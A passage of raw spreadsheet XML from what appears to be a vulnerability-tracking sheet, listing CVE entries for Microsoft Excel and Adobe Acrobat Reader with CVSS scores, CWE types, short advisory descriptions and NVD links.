      <c r="F2297" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2297" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2297" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2297" s="5" t="inlineStr"/>
      <c r="K2297" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2297" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t>
        </is>
      </c>
    </row>
    <row r="2298">
      <c r="A2298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81949</t>
        </is>
      </c>
      <c r="C2298" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2298" s="5" t="inlineStr"/>
      <c r="F2298" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2298" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2298" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2298" s="5" t="inlineStr"/>
      <c r="K2298" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2298" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t>
        </is>
      </c>
    </row>
    <row r="2299">
      <c r="A2299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81950</t>
        </is>
      </c>
      <c r="C2299" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2299" s="5" t="inlineStr"/>
      <c r="F2299" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2299" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2299" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2299" s="5" t="inlineStr"/>
      <c r="K2299" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2299" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t>
        </is>
      </c>
    </row>
    <row r="2300">
      <c r="A2300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81951</t>
        </is>
      </c>
      <c r="C2300" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2300" s="5" t="inlineStr"/>
      <c r="F2300" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2300" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2300" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2300" s="5" t="inlineStr"/>
      <c r="K2300" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2300" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t>
        </is>
      </c>
    </row>
    <row r="2301">
      <c r="A2301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81953</t>
        </is>
      </c>
      <c r="C2301" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2301" s="5" t="inlineStr"/>
      <c r="F2301" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2301" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2301" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2301" s="5" t="inlineStr"/>
      <c r="K2301" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2301" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t>
        </is>
      </c>
    </row>
    <row r="2302">
      <c r="A2302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81954</t>
        </is>
      </c>
      <c r="C2302" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2302" s="5" t="inlineStr"/>
      <c r="F2302" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2302" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2302" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2302" s="5" t="inlineStr"/>
      <c r="K2302" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2302" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t>
        </is>
      </c>
    </row>
    <row r="2303">
      <c r="A2303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81956</t>
        </is>
      </c>
      <c r="C2303" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2303" s="5" t="inlineStr"/>
      <c r="F2303" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2303" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2303" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="I2303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2303" s="5" t="inlineStr"/>
      <c r="K2303" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2303" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t>
        </is>
      </c>
    </row>
    <row r="2304">
      <c r="A2304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81957</t>
        </is>
      </c>
      <c r="C2304" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2304" s="5" t="inlineStr"/>
      <c r="F2304" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2304" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2304" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2304" s="5" t="inlineStr"/>
      <c r="K2304" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2304" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t>
        </is>
      </c>
    </row>
    <row r="2305">
      <c r="A2305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81959</t>
        </is>
      </c>
      <c r="C2305" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2305" s="5" t="inlineStr"/>
      <c r="F2305" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2305" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2305" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2305" s="5" t="inlineStr"/>
      <c r="K2305" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2305" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t>
        </is>
      </c>
    </row>
    <row r="2306">
      <c r="A2306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81960</t>
        </is>
      </c>
      <c r="C2306" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2306" s="5" t="inlineStr"/>
      <c r="F2306" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2306" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2306" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2306" s="5" t="inlineStr"/>
      <c r="K2306" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2306" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t>
        </is>
      </c>
    </row>
    <row r="2307">
      <c r="A2307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81973</t>
        </is>
      </c>
      <c r="C2307" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2307" s="5" t="inlineStr"/>
      <c r="F2307" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2307" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2307" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2307" s="5" t="inlineStr"/>
      <c r="K2307" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2307" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t>
        </is>
      </c>
    </row>
    <row r="2308">
      <c r="A2308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81975</t>
        </is>
      </c>
      <c r="C2308" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2308" s="5" t="inlineStr"/>
      <c r="F2308" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2308" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2308" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2308" s="5" t="inlineStr"/>
      <c r="K2308" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2308" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t>
        </is>
      </c>
    </row>
    <row r="2309">
      <c r="A2309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81976</t>
        </is>
      </c>
      <c r="C2309" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2309" s="5" t="inlineStr"/>
      <c r="F2309" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2309" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2309" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2309" s="5" t="inlineStr"/>
      <c r="K2309" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2309" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t>
        </is>
      </c>
    </row>
    <row r="2310">
      <c r="A2310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81979</t>
        </is>
      </c>
      <c r="C2310" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2310" s="5" t="inlineStr"/>
      <c r="F2310" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2310" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2310" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2310" s="5" t="inlineStr"/>
      <c r="K2310" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2310" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t>
        </is>
      </c>
    </row>
    <row r="2311">
      <c r="A2311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81980</t>
        </is>
      </c>
      <c r="C2311" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2311" s="5" t="inlineStr"/>
      <c r="F2311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2311" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2311" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2311" s="5" t="inlineStr"/>
      <c r="K2311" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2311" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t>
        </is>
      </c>
    </row>
    <row r="2312">
      <c r="A2312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81981</t>
        </is>
      </c>
      <c r="C2312" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2312" s="5" t="inlineStr"/>
      <c r="F2312" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2312" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2312" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2312" s="5" t="inlineStr"/>
      <c r="K2312" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2312" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t>
        </is>
      </c>
    </row>
    <row r="2313">
      <c r="A2313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81983</t>
        </is>
      </c>
      <c r="C2313" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2313" s="5" t="inlineStr"/>
      <c r="F2313" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2313" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2313" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2313" s="5" t="inlineStr"/>
      <c r="K2313" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2313" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t>
        </is>
      </c>
    </row>
    <row r="2314">
      <c r="A2314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81985</t>
        </is>
      </c>
      <c r="C2314" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2314" s="5" t="inlineStr"/>
      <c r="F2314" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2314" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2314" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2314" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2314" s="5" t="inlineStr"/>
      <c r="K2314" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2314" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t>
        </is>
      </c>
    </row>
    <row r="2315">
      <c r="A2315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81986</t>
        </is>
      </c>
      <c r="C2315" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2315" s="5" t="inlineStr"/>
      <c r="F2315" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2315" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2315" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2315" s="5" t="inlineStr"/>
      <c r="K2315" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2315" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t>
        </is>
      </c>
    </row>
    <row r="2316">
      <c r="A2316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81987</t>
        </is>
      </c>
      <c r="C2316" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2316" s="5" t="inlineStr"/>
      <c r="F2316" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2316" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2316" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2316" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2316" s="5" t="inlineStr"/>
      <c r="K2316" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2316" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t>
        </is>
      </c>
    </row>
    <row r="2317">
      <c r="A2317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81988</t>
        </is>
      </c>
      <c r="C2317" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2317" s="5" t="inlineStr"/>
      <c r="F2317" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2317" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2317" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2317" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2317" s="5" t="inlineStr"/>
      <c r="K2317" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2317" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t>
        </is>
      </c>
    </row>
    <row r="2318">
      <c r="A2318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81989</t>
        </is>
      </c>
      <c r="C2318" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
